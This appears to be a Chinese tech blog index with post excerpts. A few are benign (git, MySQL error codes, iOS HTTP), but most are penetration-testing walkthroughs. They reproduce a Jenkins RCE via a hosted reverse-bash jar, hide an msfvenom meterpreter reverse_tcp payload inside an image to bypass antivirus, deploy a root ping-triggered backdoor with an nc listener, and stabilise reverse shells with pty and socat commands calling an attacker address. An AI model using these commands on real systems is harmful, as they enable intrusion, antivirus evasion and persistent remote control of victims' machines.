1.git –no-pager show -s –format=’%an <%ae>’ //在git项目里列出邮件信息
Mysql错误编码集合解释
由于更新很频繁,这些文件中可能包含这里未列出的额外错误消息。 · 错误:1000 SQLSTATE: HY000 (ER_HASHCHK) 消息:hashchk · 错误:1001 SQLSTATE: HY000 (ER_NISAMCHK) 消息:isamchk · 错误:1002 SQLSTATE: HY000 (ER_NO) 消息:NO · 错误:1003 SQLSTATE: HY000 (ER_YES) 消息:YES · 错误:1004 SQLSTATE: HY000 (ER_CANT_CREATE_FILE) 消息:无法创建文件’%s’ (errno: %d) · 错误:1005 SQLSTATE: HY000 (ER_CANT_CREATE_TABLE) 消息:无法创建表’%s’ (errno: %d) · 错误:1006 SQLS […]
IOS开发笔记-SwiftHTTP发起http请求
jenkins RCE(CVE-2019-1003000)复现
前言:漏洞详情直接搜cve编号查看即可,这里直接复现 1.制作一个反弹bash的jar包放在公网可远程调用,以下代码保存为jkrce.java代码如下: 2.创建文件夹META-INF/serverices/,编译并写jkrce类到META-INF/serverices/org.codehaus.groovy.plugins.Runners里,如下: 3.在公网服务器里,创建路径/tools/jenkins/1/ 4.poc xxx.xxx.xxx.xxx替换成公网地址即可,其他不用填写。 等待反弹成功,成功后web页面提示如下:
使用图片携带msf payload反弹绕过各种AV
#使用说明 1.先找一个高清大图片,四位数*四位数 那种以上的jpg或者png高清大图,命名为1.jpg ,低于四位数的高清大图会失败,一般图片大小,大于1M小于2M即可 。 2.使用msfvenom生成一个powershell的反弹的payload,一定要用64位的,32位的弹不出来●msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f psh-reflection > 1.ps1 3.使用Invoke-PSImage.ps1 把powershell 反弹的payload 压缩进高清大图里。操作如下:打开cmd,并执行powershell,之后再顺序执行以下命令●Import-Module .\Invoke-PSImage.ps1●Invoke-PSImage -Scr […]
ping-backdoor使用,配合Rootkit使用效果更佳
#使用方法:1.把下列代码复制到目标机器中,保存名为 ping-backdoor.c 2.使用gcc编译●gcc -static -o ping-backdoor ping-backdoor.c●strip ping-backdoor注:如果这一步出现错误,可以尝试安装静态编译解决 yum install glibc-static 3.在目标机器中运行,要以root权限开启后门●./ping-backdoor 4.在接收反弹的电脑上使用magic.py生成范本数据包,用来ping的时候填充,促发反弹●python3 magic.py reverse_ip reverse_port //类似这样 ac1f07931a0a2a7e 5.在反弹的电脑上开启nc监听●nc -lvvp reverse_port //要和使用magic.py时候填写的端口一致 6.在反弹的电脑上ping 带有后门的主 […]
NC,bash反弹后非标准终端使用注意
一般在渗透过程中会反弹一个bash shell,但是此类反弹,命令行终端非正规的终端,键盘上下翻动无历史记录,vim编辑文件的时候,可能就会over。因为反弹出来的shell没有Sigint的,如果Ctrl+C,反弹出来的shell就会终止。这个日常操作过程中多少都会有人遇到过。然后往此反复重新反弹…. 1.可以弄一个伪终端,但是Ctrl+C还是会退出,但是显示效果和正式终端一样。 反弹成功后执行: python -c ‘import pty; pty.spawn(“/bin/bash”)’ 之后再 su 进入伪终端 2.使用socat反弹终端 监听机器执行: socat file:`tty`,raw,echo=0 tcp-listen:5555 靶机执行: socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:xxx. […]